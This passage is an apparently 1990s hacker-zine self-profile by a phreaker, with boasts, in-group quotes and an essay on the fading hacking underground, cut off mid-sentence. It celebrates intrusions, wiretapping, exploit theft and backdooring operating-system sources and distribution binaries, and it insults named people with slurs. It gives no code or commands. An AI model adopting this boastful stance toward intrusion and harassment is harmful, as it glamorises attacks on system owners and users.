|-Passions -----| pea! (no, not peaboy.. schmucks) Phones. UNIX & VMS internals. Learning new programming languages and operating systems. Fast cars, clever & beautiful women, good music, Guinness, good food, winter, spring, summer, fall, nights, sunsets, sunrises, good books, sleeping, ms. pacman coffee tables, cycling, coca-cola, mountain dew, water slides, learning, booze, sex/drugs/rocknroll, ice cream, weaponry, playing football, friends, video games..
anything as long as it's fun |----------------- M E M O R A B L E E X P E R I E N C E Z -----------------| Buying my first modem, and installing it. Installing QModem & calling my first BBS. Being introduced to the concept of hacking/phreaking by a local sysop (who I am still the best of friends with today). He told me I should download Phrack ('get phrack.. that zine rocks d00d, it has the best philes!'). So I dl'd the latest issue at the time, which was Phrack 46. PBXes (System75s, SL-1s, Rolms, DataStar & all the rest..) Setting up my first Alliance teleconference (0-700-456-1000) CBI Writing my first t-file Figuring out how to spawn DCL shells from captive and guest accounts. On a dialup UNIX machine, in a distant galaxy, a long, LONG time ago.. the first '#' prompt I ever saw. First NUI (it was on sprintnet) First sniffer log (sunsniffer r0ckz) First time on a DMS-100 First unpublished exploit (thanks to Scott Chasin for his generous - albeit involuntary - donation :)) Being invited to join the Phone Losers of America by el_jefe. (Anyone other than myself, dhate, and el_jefe who claims PLA is a poser. Especially RBCP and his band of gay doodleboys.) Meeting tr0ut (by hacking a system he was using) & joining H4G1S in its infancy. First root shell on a 5ESS. Yahoo! Two words.. Jay Dyson. The first (root-yielding) hole I found in UNIX. The first exploit I ever stole. The first exploit I ever wrote. Mastering digital wiretapping. Being woken up by FBI agents. Monitoring a certain computer security expert from California who appeared in Wired Magazine along with Mark Lottor as "V.T." in an article written by John Markoff about cellular phreaking. (Restore your honor.. come and get me, big guy. And get busted for eavesdropping on phonesex!@) When dk, prym, and I forwarded a certain Phrack editor's phone line to a bridge, and took all his calls for a weekend. (Sorry about that, route.. water under the bridge ;)) [ EdNote: it wasn't for a weekend fuck0! 
It was for a day (I disconnected the number that afternoon -- and I still remember it because it was so elite: 2801600). ] IRC'ing as erikb. Mocking "security expert" Scott Yelich while breaking into his 'secure' machine, security.spy.org. (He ended up pulling his cables.. lame). Owning everyone and everything. c4p3b0y vs. andy 0f m4yb3rry autoreplyd groktelnet Backdooring the source code of several popular commercial & free operating systems, and binary distributions of popular packages at their distro sites. (I'll bet that gives you a warm, fuzzy feeling just thinking about it.) Cheating on every online game in existence for laughs (a lot of them with DK) kibitz on beelzebub (y0y0 neal!) Writing BoW 9 with U4EA, Lister, and DK All the funny prank calls, especially with el_jefe, dhate, U4EA & DK. My first con (pumpcon).. the kind of experience that's memorable because nobody lets you forget it ;) whackpack.hilarious.log gay.log our short-lived young apprentice (dead_rat of the LoD!@##$) elastic's 'creatively edited' logs sloppy's ass mailing list & everything associated with it - 50mb of email a day, getting threatened with lawsuits by Captain Zap (world-class retard, belongs in the meinel-vranesevich-shipley-brianmartin trashcan), Agent Steal's 400k ego rants, elastic's incoherent & hilarious ravings, etc etc. SEAWORLD ADVENTURE SARLO Oh yeah, and boards to mention: The Forbidden City Ripco The Toll Center Demon Roach Underground The Station Error 23 Realms of Valor |-------------------------------- Q U O T E Z --------------------------------| GO AWAY PLA! It's not paranoia if they're really after you. leggo my eggo pea *SPINS* "KTHNX!" -pea ??? P4NTZ/H4G1S - GL0B4L D0M1N4Ti0N '97 P4NTZ/H4G1S - GL0B4L D0M1N4Ti0N '97 - PR1S0N '98 If you're not owned by H4G1S, you're not worth owning. If you're not worth owning, you're probably owned by H4G1S anyway. '$show users /full/int/givemesysprivs' "yeah, but, uh, how are we supposed to chmod chmod?" 
"dog" - tr0ut Welcome to OpenBSD: The proactively secure Unix-like operating system. "The dragons breath was warm and damp, it fogged up the mirror, I wiped the mirror with a tissue, the tissue tore, the dragon swallowed the damp tissue whole." (probably not exact) - tr0ut "f dragons" - tr0ut y0y0y0, sl0ppy 0n the m1c watch my h1p tr1x 0n da bmx b1ke I'm whirlin' and twirlin' like a bat 0utta hell d00d, that stench, it's me, I smell! 0n the payph0nez iz where I l1ke t0 be call1ng ppl I d0nt even kn0w in TURKEY! HEHEHE! I have a psychopathic streak! messaging st4r ab0ut drag0nz iz when I'm at my peak! g00d g0d r0d, that tissue is damp! watch th1s 360 of the handicap r4mp! 0ff I g0, b1king int0 the sun tissuez and payph0nez, my life iz s0 fun! - tr0ut freestyling on the topic of the official H4G1S BMXer "what's a golden shower?" <2 minutes later> "this is waq.. you can see people peeing!" - sloppy "hmm, huh, hrmm, duh, drhfhfhfmasfh rhummm shoelaces?" "Don't question my technical abilities!" - Agent Steal "I hate JP more than I hate banana candy" - dk "We're so money and we don't even know it" - dk "i've had a lot of practice swordfighting underwater" "-shep-" -u4ea "Do they live in each others basements?" - eubern1g "Waaleikum Pastrami!" - eubern1g "Summa Sedes Non Capit Duos" I would like to include a lot of other things the people listed below have said that aren't included here - most of them are often pretty witty & funny. A lot of stupid things that people have said crossed my mind as well, but I decided I didn't want their words showing up in my Quotes.. :) But, since I wrote this up from memory, and also due to space limitations, this is not possible.. Oh well. |--------- T H E F U T U R E O F T H E U N D E R G R O U N D ----------| Asking this question is analogous to asking a question about the future of 8-tracks or dodo birds. The underground is no longer underground. 
Forums which once existed for the discussion of hacking/phreaking, and the use of technology toward that end, now exist for bands of semi-skilled programmers and self-proclaimed security experts to yammer about their personal lives, which exist almost entirely on the awful medium known as IRC. The BBS, where the hack/phreak underground grew from, is long since dead. Any chump can buy access to the largest network in the world for $19.95 a month, then show up on IRC or some other equally lame forum, claiming to be a hacker because they read bugtraq and can run exploits (or even worse, because they can utilize denial-of-service attacks). The hacker mindset has become a nonexistent commodity in the new corporate and media-friendly 'underground.' And everyone who was a real part of the hacking/phreaking scene - at one point or another decided they'd rather make money being legit than risk legal troubles and wrecking their future for nothing. Myself included. The watered down underground's definition of a hacker is invariably something like: "Someone who can code," or "Someone who can hack webpages," etc. The motives and goals of this 'scene' are also entirely different, and it can be safely concluded that it will continue to degenerate further, at a rapid pace. On the flip side, going legit is a good thing... I, for one, would rather be on the right side of the law, and getting paid for it - it was fun while it lasted, and I learned